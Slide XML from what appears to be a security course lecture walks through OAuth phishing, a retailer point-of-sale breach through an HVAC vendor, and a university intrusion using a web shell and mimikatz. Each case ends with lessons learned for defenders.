            <a:pPr marL="171450" lvl="1">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stop, look, and think BEFORE you click</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Who sent it?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case, it was likely someone you knew.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Who is it addressed to?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It wasn’t addressed to you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Expecting a document from this person?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some cases, maybe not!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Why is it asking for access it should already have?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google doesn’t need to ask you to give itself access to itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As threats change, our education needs to change with new technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3413322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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email is a lot more than email these days.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to review and improve steps to monitor OAuth API access by 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parties in our G Suite admin panel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logs are not written in real time, could be up to a 15 minute delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can script this, working to get reports ingested into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party Cloud Access Security Broker (CASB) tools like Cloud Lock made organizational wide blocking of this app easy but that is not a cheap product (in $ or people) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2918102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Do a periodic review of what you allow to your Google Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://myaccount.google.com/permissions</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5" y="3023088"/>
            <a:ext cx="6381750" cy="2314575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3828003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Major retailer hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers targeted a small company that handles HVAC for a region of the US that the retailer is in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendor has access to remotely connect to retailer’s network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers login to retailer network and perform recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers have almost total access to retailer network, including point of sale terminals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93632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E87D-4E2C-6B45-88A5-4609200DAD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Threat Landscape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BB14124-5EC2-3646-B3DB-C58CA8B27375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Pre-2016 most “motivated” attackers are focused on large tech, banks, government </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"Because that's where the money is" - Willie Sutton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2016 on as ransomware, financial fraud, and supply chain attacks began to explode  -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>everyone is now a target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>No more security through obscurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3814415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Major retailer hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Between Nov 15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Nov 28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attackers install malware on a few POS systems to see if it works and if they are detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nov 28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malware pushed via retailer’s own mechanism to update POS terminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware is known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BlackPOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, malware for sale that infects point of sale machines and scrapes credit/debit card info/mag swipe info as it is stored in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”advanced threat protection” (FireEye) had been recently installed but not tuned, it was generating alerts but they were ignored</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2133962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retailer attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Dec 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="30000" dirty="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>– attackers begin exfil of card data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Dec 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>– attacker begin selling card data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Dec 13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>– story breaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376004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C61B-9ED7-9C4C-9C74-F73AD86F21CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retailer – Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E03663C7-DD15-8740-8E2C-D33DF19FD310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Lots of OSINT available about retailer’s IT environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Case studies on their IT environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Public lists of their vendors who use their vendor portal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PCI/POS network/systems not sufficiently segmented from rest of the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Log Monitoring not adequately performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Focusing on the wrong things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Malware alerts from POS/PCI network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4074151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University hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker finds a poorly coded web app they use to upload a web shell on a small departmental server (Windows Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to grab the password of the admin who was logged in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connects to admin’s desktop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to get their regular user password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reads admin’s email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607279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8-11 at 11.01.28 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-6853" r="-6853"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-189540" y="616240"/>
            <a:ext cx="9181841" cy="5784560"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354534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University hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Spots an email exchange between admin and IT admin for the central IT group about an issue on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Sends an email to central IT admin that the “issue” is happening again and if they can login to try and fix it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to get central IT admin’s admin account password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1534561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8-11 at 11.03.35 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-24414" r="-24414"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-393775" y="522870"/>
            <a:ext cx="9330048" cy="5877930"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100681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University hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Connects to IT admin’s desktop, gets more credentials and spreads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Uses IT admin’s credentials to connect to AD Domain Controllers and dump credentials of users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Used those credentials to find research in Engineering/CS/Physics/other science fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Began to exfil data when detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>CPU spike to 100% on a system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081970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info on this “APT”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Read the “Operation-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Cleaver.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>” document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>In the “Readings” folder inside the Files section of ELMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="580052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578E-2EDE-DB44-9046-955D11DACDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>University – Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F930E5-6E99-D443-B647-F50A38E8FC43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Adding a second layer of AD admin accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Domain Admin – only accessed via a dedicated system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Local Admin – use to login to systems for admin work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Regular user – ever day use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Multi-factor authentication everywhere!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/HIPS to key systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Additional alerting around multiple logins to many different systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Monitoring/alerting improvements needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1185221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C4BD-4ADB-0040-978B-CC373D98C3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker Motivations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
